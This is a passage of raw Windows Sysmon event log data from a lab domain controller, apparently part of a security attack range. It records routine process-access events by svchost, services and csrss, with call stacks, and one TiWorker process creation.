4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000009906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1700-00000000A301}1632C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-1100-00000000A301}11721848C:\Windows\system32\svchost.exe{59A5CD1D-93F7-6005-E904-00000000A301}4480C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+157b1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+1f3a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1439d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.149{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:16.149{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.153{59A5CD1D-93F8-6005-EC04-00000000A301}2488C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 
10341000x80000000000000009883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.133{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009882Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:16.102{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009881Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
